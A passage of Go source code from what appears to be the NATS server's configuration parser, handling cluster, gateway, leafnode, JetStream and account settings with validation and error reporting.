if key, ok := mv.(string); ok {
keys = append(keys, key)
} else {
err := &configErr{tk, fmt.Sprintf("error parsing trusted: unsupported type in array %T", mv)}
*errors = append(*errors, err)
continue
}
}
o.TrustedKeys = keys
default:
err := &configErr{tk, fmt.Sprintf("error parsing trusted: unsupported type %T", v)}
*errors = append(*errors, err)
}
// Do a quick sanity check on keys
for _, key := range o.TrustedKeys {
if !nkeys.IsValidPublicOperatorKey(key) {
err := &configErr{tk, fmt.Sprintf("trust key %q required to be a valid public operator nkey", key)}
*errors = append(*errors, err)
}
}
case "connect_error_reports":
o.ConnectErrorReports = int(v.(int64))
case "reconnect_error_reports":
o.ReconnectErrorReports = int(v.(int64))
case "websocket", "ws":
if err := parseWebsocket(tk, o, errors, warnings); err != nil {
*errors = append(*errors, err)
return
}
case "mqtt":
if err := parseMQTT(tk, o, errors, warnings); err != nil {
*errors = append(*errors, err)
return
}
default:
if au := atomic.LoadInt32(&allowUnknownTopLevelField); au == 0 && !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
func parseDuration(field string, tk token, v interface{}, errors *[]error, warnings *[]error) time.Duration {
if wd, ok := v.(string); ok {
if dur, err := time.ParseDuration(wd); err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing %s: %v", field, err)}
*errors = append(*errors, err)
return 0
} else {
return dur
}
} else {
// Backward compatible with old type, assume this is the
// number of seconds.
err := &configWarningErr{
field: field,
configErr: configErr{
token: tk,
reason: field + " should be converted to a duration",
},
}
*warnings = append(*warnings, err)
return time.Duration(v.(int64)) * time.Second
}
}
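// Illustrative config sketch (values assumed): fields parsed through
// parseDuration, such as ping_interval or write_deadline, accept Go duration
// strings, e.g. ping_interval: "2m", while a bare integer such as
// ping_interval: 120 is still read as seconds and triggers a warning.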
func trackExplicitVal(opts *Options, pm *map[string]bool, name string, val bool) {
m := *pm
if m == nil {
m = make(map[string]bool)
*pm = m
}
m[name] = val
}
// hostPort is simple struct to hold parsed listen/addr strings.
type hostPort struct {
host string
port int
}
// parseListen will parse listen option which is replacing host/net and port
func parseListen(v interface{}) (*hostPort, error) {
hp := &hostPort{}
switch vv := v.(type) {
// Only a port
case int64:
hp.port = int(vv)
case string:
host, port, err := net.SplitHostPort(vv)
if err != nil {
return nil, fmt.Errorf("could not parse address string %q", vv)
}
hp.port, err = strconv.Atoi(port)
if err != nil {
return nil, fmt.Errorf("could not parse port %q", port)
}
hp.host = host
default:
return nil, fmt.Errorf("expected port or host:port, got %T", vv)
}
return hp, nil
}
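// Illustrative config sketch (values assumed): listen accepts either a bare
// port or a host:port string, e.g.
// listen: 4222
// listen: "0.0.0.0:4222"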
// parseCluster will parse the cluster config.
func parseCluster(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
cm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected map to define cluster, got %T", v)}
}
for mk, mv := range cm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "name":
opts.Cluster.Name = mv.(string)
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
opts.Cluster.Host = hp.host
opts.Cluster.Port = hp.port
case "port":
opts.Cluster.Port = int(mv.(int64))
case "host", "net":
opts.Cluster.Host = mv.(string)
case "authorization":
auth, err := parseAuthorization(tk, opts, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if auth.users != nil {
err := &configErr{tk, "Cluster authorization does not allow multiple users"}
*errors = append(*errors, err)
continue
}
opts.Cluster.Username = auth.user
opts.Cluster.Password = auth.pass
opts.Cluster.AuthTimeout = auth.timeout
if auth.defaultPermissions != nil {
err := &configWarningErr{
field: mk,
configErr: configErr{
token: tk,
reason: `setting "permissions" within cluster authorization block is deprecated`,
},
}
*warnings = append(*warnings, err)
// Do not set permissions if they were specified in top-level cluster block.
if opts.Cluster.Permissions == nil {
setClusterPermissions(&opts.Cluster, auth.defaultPermissions)
}
}
case "routes":
ra := mv.([]interface{})
routes, errs := parseURLs(ra, "route")
if errs != nil {
*errors = append(*errors, errs...)
continue
}
opts.Routes = routes
case "tls":
config, tlsopts, err := getTLSConfig(tk)
if err != nil {
*errors = append(*errors, err)
continue
}
opts.Cluster.TLSConfig = config
opts.Cluster.TLSTimeout = tlsopts.Timeout
opts.Cluster.TLSMap = tlsopts.Map
opts.Cluster.TLSCheckKnownURLs = tlsopts.TLSCheckKnownURLs
case "cluster_advertise", "advertise":
opts.Cluster.Advertise = mv.(string)
case "no_advertise":
opts.Cluster.NoAdvertise = mv.(bool)
trackExplicitVal(opts, &opts.inConfig, "Cluster.NoAdvertise", opts.Cluster.NoAdvertise)
case "connect_retries":
opts.Cluster.ConnectRetries = int(mv.(int64))
case "permissions":
perms, err := parseUserPermissions(mv, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
// Dynamic response permissions do not make sense here.
if perms.Response != nil {
err := &configErr{tk, "Cluster permissions do not support dynamic responses"}
*errors = append(*errors, err)
continue
}
// This will possibly override permissions that were define in auth block
setClusterPermissions(&opts.Cluster, perms)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
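// Illustrative config sketch (values and route URL scheme assumed): a minimal
// cluster block using the keys handled above might look like
// cluster { name: "C1", listen: "0.0.0.0:6222", routes: ["nats-route://seed:6222"], no_advertise: true }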
func parseURLs(a []interface{}, typ string) (urls []*url.URL, errors []error) {
urls = make([]*url.URL, 0, len(a))
var lt token
defer convertPanicToErrorList(&lt, &errors)
for _, u := range a {
tk, u := unwrapValue(u, &lt)
sURL := u.(string)
url, err := parseURL(sURL, typ)
if err != nil {
err := &configErr{tk, err.Error()}
errors = append(errors, err)
continue
}
urls = append(urls, url)
}
return urls, errors
}
func parseURL(u string, typ string) (*url.URL, error) {
urlStr := strings.TrimSpace(u)
url, err := url.Parse(urlStr)
if err != nil {
return nil, fmt.Errorf("error parsing %s url [%q]", typ, urlStr)
}
return url, nil
}
func parseGateway(v interface{}, o *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
gm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected gateway to be a map, got %T", v)}
}
for mk, mv := range gm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "name":
o.Gateway.Name = mv.(string)
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.Gateway.Host = hp.host
o.Gateway.Port = hp.port
case "port":
o.Gateway.Port = int(mv.(int64))
case "host", "net":
o.Gateway.Host = mv.(string)
case "authorization":
auth, err := parseAuthorization(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if auth.users != nil {
*errors = append(*errors, &configErr{tk, "Gateway authorization does not allow multiple users"})
continue
}
o.Gateway.Username = auth.user
o.Gateway.Password = auth.pass
o.Gateway.AuthTimeout = auth.timeout
case "tls":
config, tlsopts, err := getTLSConfig(tk)
if err != nil {
*errors = append(*errors, err)
continue
}
o.Gateway.TLSConfig = config
o.Gateway.TLSTimeout = tlsopts.Timeout
o.Gateway.TLSMap = tlsopts.Map
o.Gateway.TLSCheckKnownURLs = tlsopts.TLSCheckKnownURLs
case "advertise":
o.Gateway.Advertise = mv.(string)
case "connect_retries":
o.Gateway.ConnectRetries = int(mv.(int64))
case "gateways":
gateways, err := parseGateways(mv, errors, warnings)
if err != nil {
return err
}
o.Gateway.Gateways = gateways
case "reject_unknown", "reject_unknown_cluster":
o.Gateway.RejectUnknown = mv.(bool)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
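// Illustrative config sketch (values and URL scheme assumed): a minimal gateway
// block using the keys handled above might look like
// gateway { name: "A", listen: "0.0.0.0:7222", gateways: [ { name: "B", url: "nats://b.example.com:7222" } ] }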
var dynamicJSAccountLimits = &JetStreamAccountLimits{-1, -1, -1, -1}
// Parses jetstream account limits for an account. Simple setup with boolean is allowed, and we will
// use dynamic account limits.
func parseJetStreamForAccount(v interface{}, acc *Account, errors *[]error, warnings *[]error) error {
var lt token
tk, v := unwrapValue(v, &lt)
// Value here can be bool, or string "enabled" or a map.
switch vv := v.(type) {
case bool:
if vv {
acc.jsLimits = dynamicJSAccountLimits
}
case string:
switch strings.ToLower(vv) {
case "enabled", "enable":
acc.jsLimits = dynamicJSAccountLimits
case "disabled", "disable":
acc.jsLimits = nil
default:
return &configErr{tk, fmt.Sprintf("Expected 'enabled' or 'disabled' for string value, got '%s'", vv)}
}
case map[string]interface{}:
jsLimits := &JetStreamAccountLimits{-1, -1, -1, -1}
for mk, mv := range vv {
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "max_memory", "max_mem", "mem", "memory":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxMemory = int64(vv)
case "max_store", "max_file", "max_disk", "store", "disk":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxStore = int64(vv)
case "max_streams", "streams":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxStreams = int(vv)
case "max_consumers", "consumers":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxConsumers = int(vv)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
acc.jsLimits = jsLimits
default:
return &configErr{tk, fmt.Sprintf("Expected map, bool or string to define JetStream, got %T", v)}
}
return nil
}
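// Illustrative account config sketch (values assumed): per-account JetStream is
// either a simple toggle or a limits map, e.g.
// jetstream: enabled
// jetstream { max_mem: 1073741824, max_streams: 10, max_consumers: 100 }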
// Parse enablement of jetstream for a server.
func parseJetStream(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var lt token
tk, v := unwrapValue(v, &lt)
// Value here can be bool, or string "enabled" or a map.
switch vv := v.(type) {
case bool:
opts.JetStream = v.(bool)
case string:
switch strings.ToLower(vv) {
case "enabled", "enable":
opts.JetStream = true
case "disabled", "disable":
opts.JetStream = false
default:
return &configErr{tk, fmt.Sprintf("Expected 'enabled' or 'disabled' for string value, got '%s'", vv)}
}
case map[string]interface{}:
for mk, mv := range vv {
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "store_dir", "storedir":
opts.StoreDir = mv.(string)
case "max_memory_store", "max_mem_store", "max_mem":
opts.JetStreamMaxMemory = mv.(int64)
case "max_file_store", "max_file":
opts.JetStreamMaxStore = mv.(int64)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
opts.JetStream = true
default:
return &configErr{tk, fmt.Sprintf("Expected map, bool or string to define JetStream, got %T", v)}
}
return nil
}
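// Illustrative server config sketch (values assumed): server-level JetStream is
// enabled with a boolean/string or configured via a map, e.g.
// jetstream: enabled
// jetstream { store_dir: "/var/lib/nats", max_memory_store: 1073741824, max_file_store: 10737418240 }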
// parseLeafNodes will parse the leaf node config.
func parseLeafNodes(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
cm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected map to define a leafnode, got %T", v)}
}
for mk, mv := range cm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
opts.LeafNode.Host = hp.host
opts.LeafNode.Port = hp.port
case "port":
opts.LeafNode.Port = int(mv.(int64))
case "host", "net":
opts.LeafNode.Host = mv.(string)
case "authorization":
auth, err := parseLeafAuthorization(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
opts.LeafNode.Username = auth.user
opts.LeafNode.Password = auth.pass
opts.LeafNode.AuthTimeout = auth.timeout
opts.LeafNode.Account = auth.acc
opts.LeafNode.Users = auth.users
// Validate user info config for leafnode authorization
if err := validateLeafNodeAuthOptions(opts); err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
case "remotes":
// Parse the remote options here.
remotes, err := parseRemoteLeafNodes(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
opts.LeafNode.Remotes = remotes
case "reconnect", "reconnect_delay", "reconnect_interval":
opts.LeafNode.ReconnectInterval = time.Duration(int(mv.(int64))) * time.Second
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if opts.LeafNode.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
opts.LeafNode.TLSTimeout = tc.Timeout
case "leafnode_advertise", "advertise":
opts.LeafNode.Advertise = mv.(string)
case "no_advertise":
opts.LeafNode.NoAdvertise = mv.(bool)
trackExplicitVal(opts, &opts.inConfig, "LeafNode.NoAdvertise", opts.LeafNode.NoAdvertise)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
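// Illustrative config sketch (values and URL scheme assumed): a leafnodes block
// accepting connections and soliciting one remote might look like
// leafnodes { listen: "0.0.0.0:7422", remotes: [ { url: "nats-leaf://hub.example.com:7422", account: "APP" } ] }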
// This is the authorization parser adapter for the leafnode's
// authorization config.
func parseLeafAuthorization(v interface{}, errors *[]error, warnings *[]error) (*authorization, error) {
var (
am map[string]interface{}
tk token
lt token
auth = &authorization{}
)
defer convertPanicToErrorList(&lt, errors)
_, v = unwrapValue(v, &lt)
am = v.(map[string]interface{})
for mk, mv := range am {
tk, mv = unwrapValue(mv, &lt)
switch strings.ToLower(mk) {
case "user", "username":
auth.user = mv.(string)
case "pass", "password":
auth.pass = mv.(string)
case "timeout":
at := float64(1)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
auth.timeout = at
case "users":
users, err := parseLeafUsers(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
auth.users = users
case "account":
auth.acc = mv.(string)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
continue
}
}
return auth, nil
}
// This is a trimmed down version of parseUsers that is adapted
// for the users possibly defined in the authorization{} section
// of leafnodes {}.
func parseLeafUsers(mv interface{}, errors *[]error, warnings *[]error) ([]*User, error) {
var (
tk token
lt token
users = []*User{}
)
defer convertPanicToErrorList(&lt, errors)
tk, mv = unwrapValue(mv, &lt)
// Make sure we have an array
uv, ok := mv.([]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected users field to be an array, got %v", mv)}
}
for _, u := range uv {
tk, u = unwrapValue(u, &lt)
// Check it's a map/struct
um, ok := u.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected user entry to be a map/struct, got %v", u)}
*errors = append(*errors, err)
continue
}
user := &User{}
for k, v := range um {
tk, v = unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "user", "username":
user.Username = v.(string)
case "pass", "password":
user.Password = v.(string)
case "account":
// We really want to save just the account name here, but
// the User object is *Account. So we create an account object
// but it won't be registered anywhere. The server will just
// use opts.LeafNode.Users[].Account.Name. Alternatively
// we need to create internal objects to store u/p and account
// name and have a server structure to hold that.
user.Account = NewAccount(v.(string))
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
users = append(users, user)
}
return users, nil
}
func parseRemoteLeafNodes(v interface{}, errors *[]error, warnings *[]error) ([]*RemoteLeafOpts, error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
ra, ok := v.([]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected remotes field to be an array, got %T", v)}
}
remotes := make([]*RemoteLeafOpts, 0, len(ra))
for _, r := range ra {
tk, r = unwrapValue(r, &lt)
// Check it's a map/struct
rm, ok := r.(map[string]interface{})
if !ok {
*errors = append(*errors, &configErr{tk, fmt.Sprintf("Expected remote leafnode entry to be a map/struct, got %v", r)})
continue
}
remote := &RemoteLeafOpts{}
for k, v := range rm {
tk, v = unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "url", "urls":
switch v := v.(type) {
case []interface{}, []string:
urls, errs := parseURLs(v.([]interface{}), "leafnode")
if errs != nil {
*errors = append(*errors, errs...)
continue
}
remote.URLs = urls
case string:
url, err := parseURL(v, "leafnode")
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
remote.URLs = append(remote.URLs, url)
default:
*errors = append(*errors, &configErr{tk, fmt.Sprintf("Expected remote leafnode url to be an array or string, got %v", v)})
continue
}
case "account", "local":
remote.LocalAccount = v.(string)
case "creds", "credentials":
p, err := expandPath(v.(string))
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
remote.Credentials = p
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if remote.TLSConfig, err = GenTLSConfig(tc); err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
// If ca_file is defined, GenTLSConfig() sets TLSConfig.ClientCAs.
// Set RootCAs since this tls.Config is used when soliciting
// a connection (therefore behaves as a client).
remote.TLSConfig.RootCAs = remote.TLSConfig.ClientCAs
if tc.Timeout > 0 {
remote.TLSTimeout = tc.Timeout
} else {
remote.TLSTimeout = float64(DEFAULT_LEAF_TLS_TIMEOUT)
}
case "hub":
remote.Hub = v.(bool)
case "deny_imports", "deny_import":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
remote.DenyImports = subjects
case "deny_exports", "deny_export":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
remote.DenyExports = subjects
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
remotes = append(remotes, remote)
}
return remotes, nil
}
// Parse TLS and returns a TLSConfig and TLSTimeout.
// Used by cluster and gateway parsing.
func getTLSConfig(tk token) (*tls.Config, *TLSConfigOpts, error) {
tc, err := parseTLS(tk, false)
if err != nil {
return nil, nil, err
}
config, err := GenTLSConfig(tc)
if err != nil {
err := &configErr{tk, err.Error()}
return nil, nil, err
}
// For clusters/gateways, we will force strict verification. We also act
// as both client and server, so will mirror the rootCA to the
// clientCA pool.
config.ClientAuth = tls.RequireAndVerifyClientCert
config.RootCAs = config.ClientCAs
return config, tc, nil
}
func parseGateways(v interface{}, errors *[]error, warnings *[]error) ([]*RemoteGatewayOpts, error) {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
// Make sure we have an array
ga, ok := v.([]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected gateways field to be an array, got %T", v)}
}
gateways := []*RemoteGatewayOpts{}
for _, g := range ga {
tk, g = unwrapValue(g, &lt)
// Check it's a map/struct
gm, ok := g.(map[string]interface{})
if !ok {
*errors = append(*errors, &configErr{tk, fmt.Sprintf("Expected gateway entry to be a map/struct, got %v", g)})
continue
}
gateway := &RemoteGatewayOpts{}
for k, v := range gm {
tk, v = unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "name":
gateway.Name = v.(string)
case "tls":
tls, tlsopts, err := getTLSConfig(tk)
if err != nil {
*errors = append(*errors, err)
continue
}
gateway.TLSConfig = tls
gateway.TLSTimeout = tlsopts.Timeout
case "url":
url, err := parseURL(v.(string), "gateway")
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
gateway.URLs = append(gateway.URLs, url)
case "urls":
urls, errs := parseURLs(v.([]interface{}), "gateway")
if errs != nil {
*errors = append(*errors, errs...)
continue
}
gateway.URLs = urls
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
gateways = append(gateways, gateway)
}
return gateways, nil
}
// Sets cluster's permissions based on given pub/sub permissions,
// doing the appropriate translation.
func setClusterPermissions(opts *ClusterOpts, perms *Permissions) {
// Import is whether or not we will send a SUB for interest to the other side.
// Export is whether or not we will accept a SUB from the remote for a given subject.
// Both only affect interest registration.
// The parsing sets Import into Publish and Export into Subscribe, convert
// accordingly.
opts.Permissions = &RoutePermissions{
Import: perms.Publish,
Export: perms.Subscribe,
}
}
// Temp structures to hold account import and export definitions since they need
// to be processed after being parsed.
type export struct {
acc *Account
sub string
accs []string
rt ServiceRespType
lat *serviceLatency
rthr time.Duration
}
type importStream struct {
acc *Account
an string
sub string
to string
pre string
}
type importService struct {
acc *Account
an string
sub string
to string
share bool
}
// Checks if an account name is reserved.
func isReservedAccount(name string) bool {
return name == globalAccountName
}
func parseAccountMapDest(v interface{}, tk token, errors *[]error, warnings *[]error) (*MapDest, *configErr) {
// These should be maps.
mv, ok := v.(map[string]interface{})
if !ok {
err := &configErr{tk, "Expected an entry for the mapping destination"}
*errors = append(*errors, err)
return nil, err
}
mdest := &MapDest{}
var lt token
var sw bool
for k, v := range mv {
tk, dmv := unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "dest", "destination":
mdest.Subject = dmv.(string)
case "weight":
switch vv := dmv.(type) {
case string:
ws := vv
if strings.HasSuffix(ws, "%") {
ws = ws[:len(ws)-1]
}
weight, err := strconv.Atoi(ws)
if err != nil {
err := &configErr{tk, fmt.Sprintf("Invalid weight %q for mapping destination", ws)}
*errors = append(*errors, err)
return nil, err
}
if weight > 100 || weight < 0 {
err := &configErr{tk, fmt.Sprintf("Invalid weight %d for mapping destination", weight)}
*errors = append(*errors, err)
return nil, err
}
mdest.Weight = uint8(weight)
sw = true
case int64:
weight := vv
if weight > 100 || weight < 0 {
err := &configErr{tk, fmt.Sprintf("Invalid weight %d for mapping destination", weight)}
*errors = append(*errors, err)
return nil, err
}
mdest.Weight = uint8(weight)
sw = true
default:
err := &configErr{tk, fmt.Sprintf("Unknown entry type for weight of %v\n", vv)}
*errors = append(*errors, err)
return nil, err
}
case "cluster":
mdest.OptCluster = dmv.(string)
default:
err := &configErr{tk, fmt.Sprintf("Unknown field %q for mapping destination", k)}
*errors = append(*errors, err)
return nil, err
}
}
if !sw {
err := &configErr{tk, fmt.Sprintf("Missing weight for mapping destination %q", mdest.Subject)}
*errors = append(*errors, err)
return nil, err
}
return mdest, nil
}
// parseAccountMappings is called to parse account mappings.
func parseAccountMappings(v interface{}, acc *Account, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
am := v.(map[string]interface{})
for subj, mv := range am {
if !IsValidSubject(subj) {
err := &configErr{tk, fmt.Sprintf("Subject %q is not a valid subject", subj)}
*errors = append(*errors, err)
continue
}
tk, v := unwrapValue(mv, &lt)
switch vv := v.(type) {
case string:
if err := acc.AddMapping(subj, v.(string)); err != nil {
err := &configErr{tk, fmt.Sprintf("Error adding mapping for %q: %v", subj, err)}
*errors = append(*errors, err)
continue
}
case []interface{}:
var mappings []*MapDest
for _, mv := range v.([]interface{}) {
tk, amv := unwrapValue(mv, &lt)
mdest, err := parseAccountMapDest(amv, tk, errors, warnings)
if err != nil {
continue
}
mappings = append(mappings, mdest)
}
// Now add them in..
if err := acc.AddWeightedMappings(subj, mappings...); err != nil {
err := &configErr{tk, fmt.Sprintf("Error adding mapping for %q: %v", subj, err)}
*errors = append(*errors, err)
continue
}
case interface{}:
tk, amv := unwrapValue(mv, &lt)
mdest, err := parseAccountMapDest(amv, tk, errors, warnings)
if err != nil {
continue
}
// Now add it in..
if err := acc.AddWeightedMappings(subj, mdest); err != nil {
err := &configErr{tk, fmt.Sprintf("Error adding mapping for %q: %v", subj, err)}
*errors = append(*errors, err)
continue
}
default:
err := &configErr{tk, fmt.Sprintf("Unknown type %T for mapping destination", vv)}
*errors = append(*errors, err)
continue
}
}
return nil
}
// parseAccounts will parse the different accounts syntax.
func parseAccounts(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var (
importStreams []*importStream
importServices []*importService
exportStreams []*export
exportServices []*export
lt token
)
defer convertPanicToErrorList(&lt, errors)
tk, v := unwrapValue(v, &lt)
switch vv := v.(type) {
// Simple array of account names.
case []interface{}, []string:
m := make(map[string]struct{}, len(v.([]interface{})))
for _, n := range v.([]interface{}) {
tk, name := unwrapValue(n, &lt)
ns := name.(string)
// Check for reserved names.
if isReservedAccount(ns) {
err := &configErr{tk, fmt.Sprintf("%q is a Reserved Account", ns)}
*errors = append(*errors, err)
continue
}
if _, ok := m[ns]; ok {
err := &configErr{tk, fmt.Sprintf("Duplicate Account Entry: %s", ns)}
*errors = append(*errors, err)
continue
}
opts.Accounts = append(opts.Accounts, NewAccount(ns))
m[ns] = struct{}{}
}
// More common map entry
case map[string]interface{}:
// Track users across accounts, must be unique across
// accounts and nkeys vs users.
uorn := make(map[string]struct{})
for aname, mv := range vv {
tk, amv := unwrapValue(mv, &lt)
// Skip referenced config vars within the account block.
if tk.IsUsedVariable() {
continue
}
// These should be maps.
mv, ok := amv.(map[string]interface{})
if !ok {
err := &configErr{tk, "Expected map entries for accounts"}
*errors = append(*errors, err)
continue
}
if isReservedAccount(aname) {
err := &configErr{tk, fmt.Sprintf("%q is a Reserved Account", aname)}
*errors = append(*errors, err)
continue
}
var (
users []*User
nkeyUsr []*NkeyUser
usersTk token
)
acc := NewAccount(aname)
opts.Accounts = append(opts.Accounts, acc)
for k, v := range mv {
tk, mv := unwrapValue(v, &lt)
switch strings.ToLower(k) {
case "nkey":
nk, ok := mv.(string)
if !ok || !nkeys.IsValidPublicAccountKey(nk) {
err := &configErr{tk, fmt.Sprintf("Not a valid public nkey for an account: %q", mv)}
*errors = append(*errors, err)
continue
}
acc.Nkey = nk
case "imports":
streams, services, err := parseAccountImports(tk, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
importStreams = append(importStreams, streams...)
importServices = append(importServices, services...)
case "exports":
streams, services, err := parseAccountExports(tk, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
exportStreams = append(exportStreams, streams...)
exportServices = append(exportServices, services...)
case "jetstream":
err := parseJetStreamForAccount(mv, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
case "users":
var err error
usersTk = tk
nkeyUsr, users, err = parseUsers(mv, opts, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
case "default_permissions":
permissions, err := parseUserPermissions(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
acc.defaultPerms = permissions
case "mappings", "maps":
err := parseAccountMappings(tk, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
applyDefaultPermissions(users, nkeyUsr, acc.defaultPerms)
for _, u := range nkeyUsr {
if _, ok := uorn[u.Nkey]; ok {
err := &configErr{usersTk, fmt.Sprintf("Duplicate nkey %q detected", u.Nkey)}
*errors = append(*errors, err)
continue
}
uorn[u.Nkey] = struct{}{}
u.Account = acc
}
opts.Nkeys = append(opts.Nkeys, nkeyUsr...)
for _, u := range users {
if _, ok := uorn[u.Username]; ok {
err := &configErr{usersTk, fmt.Sprintf("Duplicate user %q detected", u.Username)}
*errors = append(*errors, err)
continue
}
uorn[u.Username] = struct{}{}
u.Account = acc
}
opts.Users = append(opts.Users, users...)
}
}
lt = tk
// Bail out now if there are previous errors.
if len(*errors) > 0 {
return nil
}
// Parse Imports and Exports here after all accounts defined.
// Do exports first since they need to be defined for imports to succeed,
// because we do permissions checks.
// Create a lookup map for accounts lookups.
am := make(map[string]*Account, len(opts.Accounts))
for _, a := range opts.Accounts {
am[a.Name] = a
}
// Do stream exports
for _, stream := range exportStreams {
// Make array of accounts if applicable.
var accounts []*Account
for _, an := range stream.accs {
ta := am[an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for stream export", an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
accounts = append(accounts, ta)
}
if err := stream.acc.AddStreamExport(stream.sub, accounts); err != nil {
msg := fmt.Sprintf("Error adding stream export %q: %v", stream.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
for _, service := range exportServices {
// Make array of accounts if applicable.
var accounts []*Account
for _, an := range service.accs {
ta := am[an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for service export", an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
accounts = append(accounts, ta)
}
